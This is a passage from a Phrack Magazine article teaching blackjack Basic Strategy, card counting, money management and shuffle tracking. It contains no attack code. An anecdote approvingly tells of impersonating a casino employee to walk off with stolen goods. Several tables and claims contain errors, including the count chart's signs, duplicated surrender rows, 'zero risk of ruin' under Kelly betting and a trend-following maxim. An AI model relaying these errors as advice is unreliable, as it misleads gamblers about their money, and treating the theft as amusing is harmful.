If there is a tie (push), neither you nor the dealer wins. Should a player get
a BlackJack (first 2 cards are an Ace and a ten) the payoff is 150% more than
the original bet ie, bet $10.00 and the payoff is $15.00.

DOUBLE DOWN: Doubling down is restricted to 2-card hands usually totalling
9, 10, or 11 although some casinos allow doubling down on any 2-card hand. If
your first two cards provide you with the appropriate total and your cards
were dealt face down, turn them over and put them on the dealer's side of the
betting square. If your first two cards provide you with the appropriate total
and your cards were dealt face up, point to them and say "double" when the
dealer prompts you for a card and simultaneously put an equal amount of chips
NEXT TO (not on top of) those already in the betting box. The dealer will give
you one more card only, then he/she will move on to the next hand.

SPLITTING PAIRS: If you have a pair that you want to split and your cards are
dealt face down, turn them over and place them a few inches apart. If your
cards were dealt face up, point to your cards and say "split" when the dealer
prompts you for a card. The original bet will go with one card and you will
have to place an equal amount of chips in the betting box near the other card.
You are now playing two hands, each as though they were regular hands with the
exception being that if you have just split two aces. In that case, you only
get one card which will hopefully be a 10. If it is a ten, that hand's total
is now 21 but the hand isn't considered a BlackJack. That is, you are paid 1:1
and not 1:1.5 as for a natural (BlackJack).

Combined example of above two plays: Say you are dealt two fives. You split
them (you dummy!). The next card is another 5 and you re-split them (you
chucklehead!!). Three hands have grown out of one AND you are now in for
three times your original bet. But wait. Say the next card is a six. So one
hand is a 5,6 which gives you eleven; another just has a 5 and the other hand
has a 5. You decide to double down on the first hand. You are dealt a 7 giving
18 which you stand on. Now a ten is dealt for the second hand and you decide
to stay at 15. The last hand is the lonely third 5, which is dealt a four for
a total of nine. You decide to double down and get an eight giving that hand a
total of 17. Shit you say, you started with a twenty dollar bet and now you
are in for a hundred! Better hope the dealer doesn't end up with a hand more
than 18 lest you lose a C-note. The moral of this example is to not get caught
up in the excitement and make rash decisions. However, there have been a
couple of times where Basic Strategy dictated that certain split and double
down plays should be made and I was very low on chips (and cash). Unless you
are *really* psychic, don't go against Basic Strategy! I didn't and usually
came out the better for it although I was really sweating the outcome of the
hand due to my low cash status. The reason it was stupid to split two fives is
that you are replacing a hand that is great for drawing on or doubling down
on, by what will probably be two shitty hands.

INSURANCE: This option comes into play when the dealer's up card is an Ace. At
this point all the players have two cards. The dealer does not check his/her
hole card before asking the players if they want insurance. The reason being
evident as the dealer can't give away the value of the hole card if the dealer
doesn't know what the hole card is. If a player wants insurance, half the
original amount bet is placed on the semicircle labeled "insurance" which is
printed on the table. If the dealer has a BlackJack the player wins the side
bet (the insurance bet) but loses the original bet, thus providing no net loss
or gain since insurance pays 2 to 1. If the dealer does not have a BlackJack,
the side bet is lost and the hand is played normally. If you are not counting
cards DO NOT TAKE INSURANCE! The proper Basic Strategy play is to decline. The
time to take insurance is when the number of non-tens to tens drops below a
2 to 1 margin since insurance pays 2 to 1. It's simple math check it yourself.

SURRENDER: This is a fairly obscure option that originated in Manila
(Philippines) in 1958 and isn't available in many casinos. There are two
versions, "early surrender" and "late surrender". Early surrender  allows
players to quit two-card hands after seeing the up card of the dealer. This
option provides the player an additional 0.62 percent favorable advantage
(significant) and therefore the obvious reason why many Atlantic City casinos
abandoned the option in 1982. Late surrender is the same as early except that
the player must wait until the dealer checks for a BlackJack. If the dealer
does not have a BlackJack then the player may surrender. The following table
was taken verbatim from [5] and is valid for games with 4+ decks. It details
the best strategy regarding late surrender as determined from intensive
computer simulation:

        TWO-CARD HAND           TOTAL           DEALER'S UP-CARD
        -------------           -----           ----------------
             9,7                 16                    ACE
             10,6 *              16 *                  ACE
             9,7 *               16 *                  10
             10,6 *              16 *                  10
             9,7 *               16 *                  10
             10,5 *              15 *                  10
             9,7                 16                     9
             10,5                16                     9

        "In a single-deck game, you would surrender only the above hands
         marked with an asterisk, as well as 7,7 against a dealer's 10
         up-card." [5]

Casino variations - Note that some casinos do not permit doubling down on
split pairs, and/or re-splitting pairs. These options provide the player with
a slight additional advantage.


Betting, Money Management, and the Psychology of Gambling:
----------------------------------------------------------

   Let me begin this section with the following statement: SCARED MONEY RARELY
WINS. Most gambling books devote quite a bit of time to the psychology of
gambling and rightfully so. There is a fine line to responsible gambling. On
one hand you shouldn't bet money that you cannot afford to lose. On the other
hand, if you are betting with money you expect to lose, where is your
confidence? When I used to gamble, it was small time. I define small time as
bringing $250.00 of 'losable' money. I've lost that much in one night. I
didn't like it, but I still ate that week. One pitfall you can easily fall
into happens AFTER you lose. You scold yourself for losing money you could
have done something productive with. "DAMN, I could have bought a 200 MB hard
drive with that!#&!". You should think about these things BEFORE you play.

   Scared money is more in the mind than real. What I mean by that is even if
you gamble with your last $10.00 in the world, it is important to play as
though you have thousands of dollars in front of you. I don't mean piss the
ten bucks away. I mean that there are certain plays you should make according
to your chosen strategy which are the optimum mathematically. Don't make
changes to it out of fear. Fear is not your friend.

   The "risk of ruin" is the percent chance that you will lose your entire
bankroll. This percentage should not exceed 5% if you plan on playing multiple
sessions to make money. The risk of ruin is dependent on the sizes of your
bets during a session. The "Kelly Criterion" provides a zero percent risk of
ruin. The system requires that you bet according to the percent advantage you
have at any one time. For example, if you are counting cards and your
advantage for a certain hand is 2% then you may bet 2% of your total bankroll.
If your total is $1000. then you can bet $20. Note that if you won the hand
your bankroll is now $1020 and if your advantage dropped to 1.5%, taking .015
times 1020 (which will determine your next bet size) in your head isn't all
that easy. The literature provides more reasonable systems, but do yourself a
favor and stay away from "betting progressions". See Reference [16] (available
on the Internet) for more information regarding risk of ruin & optimal wagers.

   If you are gambling to make money, it is important to define how much cash
you can lose before quitting. This number is called the "stop-loss limit". My
stop-loss limit was my entire session bankroll which was $250 (50 betting
units of $5.00 or 25 betting units of $10.00). This concept is especially
important if you expect to play in the casinos for more than one session. Most
books recommend that your session bankroll be about a fifth of your trip
bankroll. Unfortunately, most people who have $500 in their wallet with a self
imposed stop-loss limit is $200 will violate that limit should they lose the
two hundred. Discipline is what separates the great players from the ordinary
ones.

   Obviously you don't want to put a limit on how much you want to win.
However, if you are keeping with a structured system there are certain limits
to what your minimum and maximum bets should be. I am not going to go into
that here though.

   In my gambling experience, there has been one non-scientific concept that
has proven itself over and over again. NEVER BUCK A TREND! If you have just
won three hands in a row, don't think that you are now 'due' for a loss and
drastically scale back your bet. If you are winning go with it. A good friend
of mine who was my 'gambling mentor' won $30,000 in a 24 hour period with a
$200 beginning bankroll. This was not accomplished by scaling back bets. By
the same token, if you see that the players at a certain table are losing
consistently, don't sit down at that table. One problem that I've seen is when
someone has won a lot and starts to lose. Mentally, they keep saying, "if I
lose another $100 I will stop". They lose the hundred and say "no, really, the
NEXT $100 I lose, I will stop", etc. When they go broke, that's when they stop.
Live by the following graph typically designated as The Quitting Curve and you
won't fall into that trap:

                    |             *                  <-+
                    |            *  *                  |   Loss
                 ^  |           *    *                 |   Limit
                 |  |          *      * <----QUIT!   <-+
                 |  |         *
                 W  |        *
                 i  |       *
                 n  |      *
                 n  |     *
                 i  |    *
                 n  |   *
                 g  |  *
                    |
                    |_________________________________________
                              Time ---------------->

   Determine your loss limit and stay with it. Obviously the loss limit will
change as you keep winning. Standard loss limits are 10 to 20 percent of the
current bankroll. Note that this philosophy is also used in stock market
speculation.


Basic Strategy:
---------------

    If you only read one section of this file, and you don't already know what
Basic Strategy is, then this is the section you should read. Knowing Basic
Strategy is CRITICAL to you gaining an advantage over the house. The Basic
Strategy for a particular set of rules was developed by intensive computer
simulation which performed a complete combinatorial analysis. The computer
"played" tens of thousands of hands for each BlackJack situation possible and
statistically decided as to which play decision favored the player. The
following 3 charts should be duplicated or cut out from a hardcopy of this
file. You don't want to wave them around at a BlackJack table but its nice to
have them on hand in case you fail to recall some plays, at which time you can
run to the rest room to refresh your memory.

   I hope you don't think this is weird but I keep a copy of a certain Basic
Strategy chart in my wallet at ALL times...just in case. Just in case of what
you ask? Permit me to go off on a slight(?) tangent. The following story really
happened. In 1984 I was visiting LOD BBS co-sysop, Paul Muad'dib up in New York
City. After about a week we were very low on cash despite the Pay Phone
windfall mentioned in my Phrack Pro-Phile ;->. I contacted a friend of mine
who was working in New Jersey and he offered us a job for a couple of days. I
spent just about the last of my cash on bus fair for me and Paul figuring that
I would be getting more money soon. Some how, the destination was
miscommunicated and we ended up in Atlantic City, which was not the location of
the job. We were stuck. Our only recourse was to attempt to win some money to
get us back on track. First we needed a little more capital. Paul, being known
to physically impersonate phone company workers, and a Department of Motor
Vehicles computer technician among others, decided to impersonate a casino
employee so he could "look around". Look around he did, found a storage closet
with a portable cooler and a case of warm soda, not exactly a gold mine but
hey. He proceeded to walk that stuff right out of the casino. We commandeered
some ice and walked around the beach for an hour selling sodas. It wasn't all
that bad as scantily clad women seemed to be the ones buying them. To cut the
story short, Paul knew ESS but he didn't know BlackJack. He lost and we
resorted to calling up Sharp Razor, a fellow Legion member residing in NJ, who
gave us (or is it lent?) the cash to continue our journey. For the record, I
was fairly clueless about BlackJack at the time which really means that I
thought I knew how to play but really didn't because I didn't even know Basic
Strategy. The same goes for Paul. Had we had a chart on hand, we would at least
have made the correct plays.

   Here are the charts, memorize the one that is appropriate:


                    Las Vegas Single Deck Basic Strategy Table

                                Dealer's Up-Card
               Your  +---+---+---+---+---+---+---+---+----+---+
               Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  8  | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  9  | D | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 10  | D | D | D | D | D | D | D | D |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 11  | D | D | D | D | D | D | D | D |  D | D |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 12  | H | H | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 13  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 14  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 15  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 16  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 17  | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,2 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,3 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,4 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,5 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,6 | D | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,7 | S | D | D | D | D | S | S | H |  H | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,8 | S | S | S | S | D | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,9 | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,A | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 2,2 | H | P | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 3,3 | H | H | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 4,4 | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 6,6 | P | P | P | P | P | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 7,7 | P | P | P | P | P | P | H | H |  S | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |10,10| S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               H = Hit  S = Stand   D = Double Down   P = Split



                  Las Vegas Multiple Deck Basic Strategy Table

                                Dealer's Up-Card
               Your  +---+---+---+---+---+---+---+---+----+---+
               Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  8  | H | H | H | H | H | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  9  | H | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 10  | D | D | D | D | D | D | D | D |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 11  | D | D | D | D | D | D | D | D |  D | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 12  | H | H | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 13  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 14  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 15  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 16  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 17  | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,2 | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,3 | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,4 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,5 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,6 | H | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,7 | S | D | D | D | D | S | S | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,8 | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,9 | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,A | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 2,2 | H | H | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 3,3 | H | H | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 4,4 | H | H | H | H | H | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 6,6 | H | P | P | P | P | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 7,7 | P | P | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |10,10| S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               H = Hit  S = Stand   D = Double Down   P = Split



                   Atlantic City Multiple Deck Basic Strategy Table

                                 Dealer's Up-Card
                Your +---+---+---+---+---+---+---+---+----+---+
                Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  8  | H | H | H | H | H | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |  9  | H | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 10  | D | D | D | D | D | D | D | D |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 11  | D | D | D | D | D | D | D | D |  D | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 12  | H | H | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 13  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 14  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 15  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 16  | S | S | S | S | S | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 17  | S | S | S | S | S | S | S |  S | S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,2 | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,3 | H | H | H | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,4 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,5 | H | H | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,6 | H | D | D | D | D | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,7 | S | D | D | D | D | S | S | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,8 | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,9 | S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | A,A | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 2,2 | P | P | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 3,3 | P | P | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 4,4 | H | H | H | P | P | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 6,6 | P | P | P | P | P | H | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 7,7 | P | P | P | P | P | P | H | H |  H | H |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
               +-----+---+---+---+---+---+---+---+---+----+---+
               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               |10,10| S | S | S | S | S | S | S | S |  S | S |
               +-----+---+---+---+---+---+---+---+---+----+---+
               H = Hit  S = Stand   D = Double Down   P = Split


                 End of "How To Hack BlackJack": File 1 of 2














 

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 10 of 27

                            How to "Hack" BlackJack
                                      By
                                  Lex Luthor
                            lex@mindvox.phantom.com

                               Part 2 of 2 (50K)



Card Counting:
--------------

   Card Counting? Don't you have to be some sort of mathematical genius or
have a photographic memory to count cards? No, these are as mythical as that
415-BUG-1111 "trace detector" number posted on all those old hacker BBSes.
Well, you may now say, what if the casino is using 4, 6, or even 8 decks?
Surely you can't keep track of 300+ cards! Don't sweat these details. Probably
the hardest part about learning to play successful BlackJack has already been
accomplished in the previous section. That is: memorizing the appropriate
basic strategy chart. All you really need to count cards is the ability to
count up to plus or minus twelve or so...by ONES! Of course there are more
complicated systems but that is all you need to do for the simplest ones.

   The first card counting systems were developed by our old friend Dr. Thorp.
He determined through mathematical computation that the card that has the most
influence on the deck being in a favorable condition (for the player) was the
five. When the deck is low in fives, the player has a higher advantage than if
it's sparse in any other card. Logic dictated that for a very simple card
counting strategy, simply keep track of the abundance (or lack thereof) of
fives. This is the basis of his "Five Count" system which was later improved
to include tens and renamed the "Ten Count" system.

   Today, there are many different card counting systems. Typically, the more
complex a system is, the better your advantage should you master it. However,
the difference between card counting System X and System Y is usually so small
that ease of using the system becomes more important than gaining an
additional .15 % advantage or whatever it is. I am going to restrict the
discussion to a single card counting system: the high/low (also called the
plus/minus) point count. This strategy is very easy to master. Two other
methods that I recommend if you're serious are the Advanced Plus/Minus and the
"Hi-Opt I" systems. The former being similar to the high/low but assigns
fractional values to certain cards as opposed to integer values which are
easier to add in your head. The latter method is considered one of the most
powerful yet reasonable (with respect to complexity) counting systems of all
time and is detailed extensively on pages 213 to 277 of [7].

   The quick and dirty reason why card counting works is this: The player
gains an advantage when a deck has a SHORTAGE of cards valued 2, 3, 4, 5, 6,
7, 8. When a deck has a SHORTAGE of cards valued 9, 10, Ace; the player has a
DISadvantage. If you can tell when the deck is rich in 9's, 10's, and Aces
(ie, when you hold the advantage) you can do one of the following things:

      1) Bet more money when the deck is favorable to you.
      2) Alter your Basic Strategy play to account for the favorability
         thereby increasing the odds of winning a particular hand.
      3) Combine 1 & 2 by betting more AND altering Basic Strategy.

   Now lets discuss the +/- Point Count. As you can see from the small chart
below, a plus value is given to low cards, and a minus value is given to high
cards. Notice that 7, 8, and 9 have a value of zero. This is because their
overall effect is negligible as compared to the others. Some systems use a
value of -2 for the Ace instead of -1 and give a value of +1 to the seven
instead of zero. If you are using a BlackJack computer game for practice,
check to see what card counting system(s) it uses. They should offer one of
the above two variations. Learn that one, since it will allow you to prepare
well for actual casino play. See the "Some Comments Regarding Computer
BlackJack Programs for the PC" section for more on this. Now the chart:

                   +-----------------------------------------+
                   |    PLUS (+1)      ||     MINUS (-1)     |
                   +-----------------------------------------+
                   | 2 | 3 | 4 | 5 | 6 || 7 | 8 | 9 | 10 | A |
                   +-----------------------------------------+
                   | 1 | 1 | 1 | 1 | 1 || 0 | 0 | 0 | 1  | 1 |
                   +-----------------------------------------+

   As you may notice, this is a balanced system. There are 20 cards in a deck
that are valued +1: two through six. There are 16 ten value cards and 4 Aces
in a deck (20 total) that are valued -1. The remaining 12 cards (7, 8, 9) have
a value of zero. At the end of a deck the count should be zero. A good drill
to practice is to get a deck of cards, turn them over one by one, and keep
track of the count. If you enter a game mid-way between the deck or shoe, flat
bet until the cards are shuffled. Once the cards are shuffled commence
counting from zero.

   Lets do a quick example using ten cards. The following ten cards are shown
in the course of a hand: A, 4, 7, 10, 10, 9, 10, 2, 10, 5. Just so no one gets
lost, we will do one card at a time and then keep the running total: the first
value is -1 (the Ace) & the second is +1 (the 4) = 0 (the current total hand
count). The next card is the 7 which is zero so disregard it. The next card is
a ten so the total count is now -1. The next card is another ten, giving a
total count of -2. The next card is a nine which has a value of zero so ignore
it, total count is still at -2. Next is a ten, total count is at -3. Next is
a two which adds +1 to the minus three yielding a total of -2. A quick look at
the next two cards shows that the two will cancel each other out (-1+1=0). So
at the end of a hand of ten cards dealt to 2 players and the dealer, the point
count is minus two. This provides you with the knowledge that your are at a
slight disadvantage. Your next bet should either be the same or a unit or two
lower.

   From this example you see that it would be easier to count cards if you
play in a "cards-up" game. That way you can see all the cards as they are
dealt and count them as they go by. When the dealer deals fast, just count
every two cards. You still count each card but you only add to your total
count after every two cards since many times the two values will cancel each
other out to give a net value of zero, which doesn't need to be added to your
total. If you play in a cards-down game, you may want to consider playing at
third base. The reason being is that in a cards-down game you only see the
other players' cards:

 a) if you peek at their hand (not polite but it's not cheating like in poker)
 b) if a player busts
 c) when the dealer settles each players' hand.

   When there are other people at a table, all this happens rather quickly and
you may miss a few cards here and there which essentially invalidates your
count. You can't control how fast the dealer deals, but you can slow things
down when the dealer prompts you for a play decision.

   I am not going to discuss changing basic strategy here. The chart you
memorize in Basic Strategy section of this file will be fine for now. If you
are already adept at the plus/minus count then find a book that has a complete
system including the appropriate changes to Basic Strategy that reflect the
current running and/or true count.

   For one deck, alter your wager according to the following table:

                        BET UNITS   +/- Running Count
                        -----------------------------
                            1            +1 or less
                            2            +2 or +3
                            3            +4 or +5
                            4            +6 or +7
                            5            +8 or more

   Example: After the first hand of a one deck game, the point count is plus
four and you just bet a $5.00 chip. Before the next hand is dealt, wager
$15.00 (three units of $5.00) as the above table mandates.

   What if there are four, six, or more decks instead of just one? I recommend
that you perform a "true-count" rather than trying to remember different
betting strategies for different number of deck games. By doing a true count,
the above table can still be used.

   The True Count is found by the ensuing equation. I provide an example along
with it for the case of having a running count of +9 with one and a half decks
left unplayed. It doesn't matter how many decks are used, you just have to have
a good eye at guesstimating the number of decks that are left in the shoe. I
just measured the thickness of a deck of cards to be 5/8 (10/16) of an inch.
Hence the thickness of a half deck is 5/16 of an inch. One and a half decks
would be 10/16 + 10/16 + 5/16 = 25/16 or a little over an inch and a half. You
probably see a relationship here. The number of decks is approximately equal
to the height of the cards in inches. Easy.

                             Running Count           +9
            True Count = ----------------------  =  ----- = +6
                          # of Decks Remaining       1.5

   Looking at the table of betting units above, the proper wager would be four
units.

   If you have trouble keeping the count straight in your head, you can use
your chips as a memory storage device. After every hand tally up the net count
and update the running or true count by rearranging your chips. This is
somewhat conspicuous however, and if done blatantly, may get you labeled a
counter.

   If for some reason you despise the notion of counting cards, you may want
to pick up Reference [11], "Winning Without Counting". The author writes about
using kinesics (body language) to help determine what the dealers' hole card
is after checking for a Natural. He claims that certain dealers have certain
habits as far as body language is concerned, especially when they check to see
if they have a BlackJack. The dealer will check the hole card if he/she has a
ten value card or an Ace as the up-card. When the hand is over you will see
what the hole card really was. You may be able to discern a certain
characteristic about the dealer, such as a raising of the eyebrows whenever
the hole card is a 2-9 or perhaps a slight frown, etc. There is some
usefulness to this method but I wouldn't rely on it very much at all. I have
only used it for one particular situation. That being when the dealer has a
ten up card and checks to see if the hole card is an Ace. Note that many
dealers check the hole card very quickly and turn up just the corner of the
card so as to prevent any of the players from seeing the card. If the hole
card is an Ace, the dealer will turn over the card and declare a BlackJack.
However, if the hole card is a 4, many times the dealer will double check it.
The reason for this double take is simply that a 4 looks like an Ace from the
corner, get a deck of cards and see for yourself. A 4 really looks like an Ace
and vice-versa when the corner is checked in a QUICK motion. So, if you see
the dealer double check the hole card and NOT declare a BlackJack, you can be
fairly sure the hold card is a four, giving the dealer a total of 14. You can
now adjust your basic strategy play accordingly. This situation has only come
up a few times in my case, but once was when I had a $50.00 bet riding on the
hand and I won the hand by using that additional information. Dr. Julian Braun
has previously calculated that the player has about a 10% advantage over the
house should he/she know what the dealer's hole card is. This is quite
substantial. Of course you have to memorize a specific Basic Strategy chart
for the case of knowing what the dealers' total is in order to obtain the
maximum benefit. I haven't bothered memorizing this chart simply because it is
a rare occurrence to know what the dealers' hole card is. If you sit down at a
table with an inexperienced dealer, you might catch a couple more than usual,
but I don't think it is enough to warrant the extra work unless you want to
turn pro.

   Another thing Winning Without Counting mentions is to pay attention to the
arches and warps in the cards. Perhaps a lot of the ten value cards have a
particular warp in them due to all those times the dealer checked for a
BlackJack. The author claims that he has used this to his advantage. Maybe so,
but I don't put much stock in this technique. I have enough things to worry
about while playing.

   One last thing. There is no law or rule that says a dealer cannot count
cards. A dealer may count cards because he or she is bored but more likely is
that the casino may encourage counting. The reason being that if the deck is
favorable to the player, the house can know this and "shuffle up". This is
also called preferential shuffling (a game control measure) and it vaporizes
your advantage.


Shuffle Tracking:
-----------------

  Shuffle What? Shuffle Tracking. This is a fairly new (15 years +/-)
technique that has not been publicized very much. One problem with many of the
BlackJack books out there is that they are not hip to the current game. The
obvious reason for this is that many are old or simply re-formulate strategies
that were invented decades ago. It's just like reading "How to Hack the Primos
Version 18 Operating System" today. The file may be interesting, many of the
commands may be the same, but it doesn't detail how to take advantage of, and
subvert the CURRENT version of the OS.

   The best definition I have seen is this one quoted from Reference [5]:
"'Shuffle-tracking' is the science of following specific cards through the
shuffling process for the purpose of either keeping them in play or cutting
them out of play." The concept of Shuffle tracking appears to have resulted
from bored mathematician's research and computer simulation of shuffling
cards, a familiar theme to BlackJack you say. The main thing that I hope every
reader gets from this section is that just because someone shuffles a deck (or
decks) of cards does not in any way mean that the cards are "randomized". The
methods mentioned in the two previous sections (Basic Strategy and Card
Counting) ASSUME A RANDOM DISTRIBUTION OF CARDS! That is an important point.
According to some authors, a single deck of cards must be shuffled twenty to
thirty times to ensure a truly random dispersion. If a Casino is using a 6
deck shoe, that's 120 to 180 shuffles! Obviously they aren't going to shuffle
anywhere near that many times. But don't despair, there are some types of
shuffles which are good, and some that are bad. In fact, if the cards were
always randomly disbursed, then you would not be reading this section due to
it's lack of relevance. As in the Card Counting section, I am going to
restrict the discussion to the basics of shuffle tracking as the combination
of references listed at the end of this section provide a complete discourse of
the topic.

   A beneficial (to the player) shuffle for a one deck game is executed by
dividing the deck equally into 26 cards and shuffling them together a minimum
of three times. This allows the cards to be sufficiently intermixed to yield a
fairly random distribution. An adverse shuffle prevents the cards from mixing
completely.

   The simplest example is the Unbalanced Shuffle. As its name implies, the
dealer breaks the deck into two unequal stacks. As an example, lets say you
are playing two hands head on with the dealer and the last 10 cards in the
deck are dealt. The result of the hand was that both your hands lost to the
dealer primarily due to the high percentage of low value cards in the clump.
Note that if you were counting, you would have bet a single unit since the
deck was unfavorable. The dealer is now ready to shuffle the deck, and
separates the deck into 31 cards in one stack and 21 in the other stack. The
dealer shuffles the two stacks. If the shuffle is done from the bottom of each
stack on up, the top ten cards of the larger stack will remain intact without
mixing with any of the other cards. Those ten cards can remain in the order
they were just dealt throughout the shuffle if the process of bottom to top
shuffling is not altered. You are now asked to cut the deck. If you don't cut
the deck, the 10 cards that were dealt last hand will be dealt as your first
two hands. The result will be the same as your last and you will lose the two
hands. However, if you cut the deck exactly at the end of those ten cards, you
have just altered the future to your benefit. Those cards will now be placed at
the bottom of the deck. Should the dealer shuffle up early, you will avoid them
altogether. In addition, if you were keeping count, you would know that the
deck was favorable during the first 3-4 hands since there would be an abundance
